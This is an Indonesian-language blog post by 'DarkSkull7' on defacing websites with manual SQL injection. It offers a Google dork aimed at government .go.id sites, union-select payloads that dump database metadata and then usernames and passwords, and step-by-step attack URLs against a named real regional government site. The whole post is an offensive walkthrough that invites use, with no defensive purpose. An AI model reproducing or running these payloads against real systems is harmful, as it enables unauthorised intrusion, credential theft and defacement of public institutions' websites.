Cara Deface Poc SQL Injection Manual
Oke Balik Lagi Dengan Gua ./DarkSkull7 Gans >,< kali ini gua bakalan ngasih Tutorial Deface Dengan Teknik SQLi Manual, Teknik Ini Biasanya Sering Di Pakai Oleh Para Defacer Defacer Yang Plo:v Oke Lah Lanjut Aja Ke Tutorial Nya, Gua Males Cerita :v
Persiapan Deface ;
- Dork : inurl:news.php?id= site:.go.id
- Exploit : concat(0x496e6a6563742062792062616475742067616c6175,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
- Exploit Dump :
- (select(@x)from(select(@x:=0x00),(select(@x)from(users)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x)
Langkah-langkah Deface ;
- dorking ke google mengunakan dork yang sudah saya siapkan
- Setelah selesai dorking silahkan pilih web sesuka kalian,jika tidak vuln cari web laen.(kali ini saya akan menggunakan web www.rajaampatkab.go.id)
- Untuk mencari tau vulnnya bisa di tambahkan kode berikut: (')(")(*)(.)
- Sebelum di tambahkan (')
- sesudah di tambahkan tanda (')
- Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip,bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali.
Contoh
http://rajaampatkab.go.id/berita.php?id=205%27+order+by+1--+- Normal
http://rajaampatkab.go.id/berita.php?id=205%27+order+by+2--+- Normal
http://rajaampatkab.go.id/berita.php?id=205%27+order+by+3--+- Normal
http://rajaampatkab.go.id/berita.php?id=205%27+order+by+13--+- Normal
http://rajaampatkab.go.id/berita.php?id=205%27+order+by+14--+- Error
Berarti jumlah kolom pada database nya ada 13 kolom
- Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
- Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka.
Contoh
http://rajaampatkab.go.id/berita.php?id=-205%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+-
Nanti akan ada angka ajaibnya(angka ajaib saya yaitu 2,4,7, dan 12).
- Di langkah ini lah yang akan menentukan sukses atau ngak nya SQLi kita pada kali ini,untuk cara pemasangan exploit bisa di ikut contoh di bawah ini.
http://rajaampatkab.go.id/berita.php?id=-205'union+select+1,2,3,concat(0x496e6a6563742062792062616475742067616c6175,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),5,6,7,8,9,10,11,12,13--+-
Pemasangan exploit di letakan di letak angka ajaib yang kita temukan(saya memasang di angka 4).
- Disini kita akan menemukan Username dan password dari situs yang ingin kita deface,kali ini saya akan DUMP menggunakan DUMP yg sudah saya berikan.
Sebagai contoh ;
http://rajaampatkab.go.id/berita.php?id=-205%27+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(@x)from(users)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),5,6,7,8,9,10,11,12,13--+-
Oke Sekian Dulu Tutor Deface Dari gua ^_^ Sampai Ketemu Di Tutorial Selanjutnya T_T
Komentar
Posting Komentar
XDarkSkull7X